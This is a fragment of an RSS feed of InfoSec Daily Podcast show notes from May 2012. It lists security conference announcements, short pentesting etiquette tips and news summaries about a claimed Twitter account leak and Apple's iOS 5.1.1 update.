<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Well done to Google&#39;s engineers &#8211; even though the red colour denotes that the vehicles are still plated for testing purposes. Only when the plates are issued in green will the vehicles have been licensed for sale to and use by the public.</span><img height="272px;" src="https://lh6.googleusercontent.com/-EAGUjceNgJFD6JOiyPkenYPR5m3738yfsJHFVvD-uRf_GPtq4bQD-MjlixALX_ebRApeFnTNvYBG3msNWebqOo6vC0-zAblBTJCoH-3I01fG2mBj7s" width="277px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sadly, Google&#39;s autonomous vehicles aren&#39;t yet able to renew their own registrations online.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[end]</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-664-pentestlessons-twitter-accounts-business-foot-the-bill-bff-virgin-media-and-%e2%88%9eau001/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3921/0/infosec-daily-podcast-episode-664.mp3" length="18788774" type="audio/mpeg" />
		<itunes:duration>0:39:08</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 664 for May 9, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Dr. Bonez.
&#160;
Announcements
GraniteSec (formerly The New England InfoSec Tweetup)
	When: &#160;May 19[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 664 for May 9, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Dr. Bonez.
&#160;
Announcements
GraniteSec (formerly The New England InfoSec Tweetup)
	When: &#160;May 19, 2012&#160;&#160;&#160; 
	Where: &#160;Veasey Memorial Park, Groveland, MA
	http://granitesec.org
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#8211; Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
	When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Hack3rCon^3
When: October 19-21, 2012
Where: Charleston, WV 
	http://hack3rcon.org/ 
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Please consider making your Amazon purchases through our affiliate link. &#160;If you&#8217;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.
Or simply use our QR Code Links.
Amazon:
Amazon UK:
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Pentest Lessons


If you identify a vulnerability and the exploit can and most likely will result in a DoS. &#160;Don&#8217;t try it without ensuring that DoS are allowed in the Statement of Work.


If you&#8217;re going to perform brute-forcing, make sure that this allowed in the Statement of Work. &#160;Remember, a low threshold for account lockouts can result in you accidentally locking accounts by just simply using an nmap script or Nessus plugin.


Watch you language! &#160;Swearing or cursing in front of a customer not only makes you look unprofessional, but it calls into question everything that you do.


When traveling, often times the most difficult and stressful thing that you encounter is trying to get the customers site. &#160;Finding out that you don&#8217;t have the Point of Contact (POC) name nor customer&#8217;s address when you&#8217;re driving is probably less than optimal. &#160;Always make sure that you have this information written down so that if something happens you can still get to where you need to go.


&#160;
Stories
Source: &#160;http://mashable.com/2012/05/08/twitter-hacked-accounts/
Hackers claiming to be affiliated with the hacktivist group Anonymous claimed this week to have accessed and published the details of about 55,000 Twitter accounts.
But Twitter said Tuesday those claims are largely bogus, and that the group mostly posted duplicate information or username and password information for suspended spam accounts.
An anonymous Pastebin user posted five extremely long pages of alleged Twitter usernames and passwords to the text storage site on Monday. (Here are pages one, two, three, four and five.) The hacking news aggregator Airdemon.net reported the supposed breach on Tuesday, beginning to fuel speculation around the web of a massive successful attack on Twitter&#8217;s servers. Airdemon said celebrity accounts were among those compromised, and also claimed to have information from a &#8220;Twitter insider&#8221; confirming the attac[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 663 &#8211; Dying Tech, iOS 5.1.1, Bigger than we think?, 760 Firms Hacked, and Unprotected Leakage</title>
		<link>http://www.isdpodcast.com/episode-663-dying-tech-ios-5-1-1-bigger-than-we-think-760-firms-hacked-and-unprotected-leakage</link>
		<comments>http://www.isdpodcast.com/episode-663-dying-tech-ios-5-1-1-bigger-than-we-think-760-firms-hacked-and-unprotected-leakage#comments</comments>
		<pubDate>Wed, 09 May 2012 00:53:25 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3918</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 663 for May 8, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Dr. Bonez. &#160; Announcements GraniteSec (formerly The New England InfoSec Tweetup) When: &#160;May 19, 2012&#160;&#160;&#160; Where: &#160;Veasey Memorial Park, Groveland, MA http://granitesec.org &#160; AIDE 2012 When: May 21-25, 2012 Where: MU Forensic [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" id="internal-source-marker_0.38724468289742653" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 663 for May 8, 2012. &nbsp;</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Dr. Bonez.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Announcements</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">GraniteSec (formerly The New England InfoSec Tweetup)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;May 19, 2012&nbsp;&nbsp;&nbsp; <br class="kix-line-break" /><br />
	Where: &nbsp;Veasey Memorial Park, Groveland, MA<br class="kix-line-break" /><br />
	</span><a href="http://granitesec.org"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://granitesec.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &#8211; Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA <br class="kix-line-break" /><br />
	</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD<br class="kix-line-break" /><br />
	</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hack3rCon^3</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 19-21, 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Charleston, WV <br class="kix-line-break" /><br />
	</span><a href="http://hack3rcon.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://hack3rcon.org/</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Please consider making your Amazon purchases through our affiliate link. &nbsp;If you&rsquo;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Or simply use our QR Code Links.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Amazon:</span><img height="135px;" src="https://lh6.googleusercontent.com/kW_ANvLKtBE_Qh8GwVfiZrU5cvCWflkS3Pz751z5NTuUx0x8ZQGMw19WCtjkiKq_PVHDpv6ymU7eKVBdMQsDAzlw8pN5QNrZGVZsKfvcSma5bHM7U90" width="135px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Amazon UK:</span><img height="138px;" src="https://lh3.googleusercontent.com/CUVgxunaHapRwkr99jKmzAMsrou2mKetEKTLd-nbySoclqvnvhODitxRWPnJv7sejy9PGPIsycbOphbxNuJxBQG4QwPnEwpcujkQTKZt1GxzX93tn6M" width="138px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.telegraph.co.uk/technology/picture-galleries/8600909/Dying-technology-modern-hardware-thats-on-the-way-out.html?image=11"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.telegraph.co.uk/technology/picture-galleries/8600909/Dying-technology-modern-hardware-thats-on-the-way-out.html?image=11</span></a></p>
<ol style="margin-top:0pt;margin-bottom:0pt;">
<li style="list-style-type:decimal;font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Blackberry&rsquo;s</span></p>
</li>
<li style="list-style-type:decimal;font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Video and digital cameras</span></p>
</li>
<li style="list-style-type:decimal;font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">MP3 Players</span></p>
</li>
<li style="list-style-type:decimal;font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">eReaders</span></p>
</li>
<li style="list-style-type:decimal;font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Physical Storage Media</span></p>
</li>
<li style="list-style-type:decimal;font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Keyboards</span></p>
</li>
<li style="list-style-type:decimal;font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cables</span></p>
</li>
<li style="list-style-type:decimal;font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Newspaper</span></p>
</li>
<li style="list-style-type:decimal;font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Televisions *</span></p>
</li>
<li style="list-style-type:decimal;font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Landlines</span></p>
</li>
<li style="list-style-type:decimal;font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Fax Machines</span></p>
</li>
<li style="list-style-type:decimal;font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Keys</span></p>
</li>
</ol>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://news.cnet.com/8301-13579_3-57429285-37/apple-launches-ios-5.1.1-to-address-bugs/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-13579_3-57429285-37/apple-launches-ios-5.1.1-to-address-bugs/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple has launched an update to its iOS platform. &nbsp;The company&#39;s iOS 5.1.1 update comes with bug fixes for AirPlay video playback and the &quot;Unable to purchase&quot; error message popping up after users buy something from their device. In addition, Apple fixed a bug that prevented the new iPad from switching between 2G and 3G networks.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple&#39;s iOS 5.1.1 update comes just a couple of months after the company revealed iOS 5.1. That update delivered a host of new bug fixes, a few interface tweaks, and even a hint that the next iPhone could come with 4G LTE support. Some reports suggested the operating system version also improved the platform&#39;s battery life.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">iOS 5.1.1 is available now as a free download. Current iOS 5 users can head over to their General &gt; Software Update pane to install the new software.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:'Droid Serif';color:#222222;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://techcrunch.com/2012/05/07/mac-lion-security-passwords/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://techcrunch.com/2012/05/07/mac-lion-security-passwords/</span></a></p>
